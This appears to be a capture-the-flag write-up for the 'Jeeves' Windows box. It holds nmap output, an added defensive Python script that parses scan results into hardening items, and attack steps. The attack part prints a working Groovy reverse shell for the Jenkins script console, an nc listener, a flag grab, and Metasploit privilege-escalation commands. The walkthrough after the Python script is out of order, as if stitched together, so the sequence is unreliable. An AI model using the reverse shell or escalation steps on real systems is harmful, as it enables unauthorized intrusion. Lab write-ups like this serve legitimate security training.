┌──(root💀kali)-[~]
└─# nmap -T4 -A -p- 10.10.10.63
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 13:34 EDT
Nmap scan report for 10.10.10.63
Host is up (0.025s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10|7|Vista (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1607 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows 7 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 10 1511 - 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-08T22:44:11
|_ start_date: 2022-04-08T22:41:38
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 5h07m23s, deviation: 0s, median: 5h07m23s
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 24.57 ms 10.10.14.1
2 24.81 ms 10.10.10.63
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.40 seconds
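As an added example that is not part of the original writeup, the following Python script parses normal-format nmap output like the scan above and turns it into the hardening items a defender would raise for this host: the risky TRACE method on IIS, the HTTP service (Jetty) sitting on a non-standard port, and SMB signing that is enabled but not required. The sample input is a constructed, trimmed copy of the scan output.

```python
import re

# Constructed sample: a trimmed copy of the scan output above, same format.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_ Message signing enabled but not required
"""
# port/proto  state  service  [version ...]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Return per-port records (with the NSE lines under each port) and host-level script lines."""
    ports, host_scripts = [], []
    current, in_host = None, False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "scripts": []}
            ports.append(current)
            in_host = False
        elif line.startswith("Host script results"):
            in_host = True
        elif line.startswith("|") and (in_host or current is not None):
            body = line.lstrip("|_ ").strip()  # drop the NSE tree prefix
            (host_scripts if in_host else current["scripts"]).append(body)
    return ports, host_scripts

def findings(ports, host_scripts):
    """Turn the scan into the hardening items a defender would raise for this host."""
    out = []
    for p in ports:
        nse = " ".join(p["scripts"])
        if "Potentially risky methods" in nse and "TRACE" in nse:
            out.append((p["port"], "HTTP TRACE enabled; disable it on the web server"))
        if p["service"] == "http" and p["port"] not in (80, 443):
            out.append((p["port"], "HTTP on a non-standard port (%s); confirm it should be exposed" % p["version"]))
    signing_weak = any("message_signing: disabled" in s or "not required" in s for s in host_scripts)
    if signing_weak and any(p["port"] == 445 for p in ports):
        out.append((445, "SMB signing not required; enforce signing to defeat relay"))
    return out
```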
Port 80
Gobuster does not give much.
Port 50000
If we look at the system info, we get a user name: kohsuke
// Groovy reverse shell for the Jenkins script console: spawns cmd.exe and pumps its I/O over a socket to the listener
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();
s.close();
Let's set up a listener: rlwrap nc -lvp 8044
It works, we are jeeves\kohsuke.
We can grab our user flag: type C:\Users\kohsuke\Desktop\user.txt
It seems to give a stack trace when trying to search for something.
But it is just an image; indeed, the action of the form just goes to error.html.
Here is what we see in the browser for this port:
Gobuster does not always work the first time; we need to try different wordlists. I tried a few before getting the askjeeves result. The one that found it is directory-list-2.3-big.txt.
If we navigate to /askjeeves we find a Jenkins server.
If we go to the Jenkins CLI we can use a jar and execute commands from it.
The script console also seems interesting; let's try to get a reverse shell this way.
We can find one online here:
Here are our privileges:
We have SeImpersonatePrivilege enabled.
set SRVHOST tun0
Now we just need to execute this on our target.
And we get a Meterpreter session.
To get the built-in potato options, let's use the Metasploit exploit suggester: run post/multi/recon/local_exploit_suggester
run
And it worked.
Even though we got NT AUTHORITY\SYSTEM, the root flag is not here; instead we have this: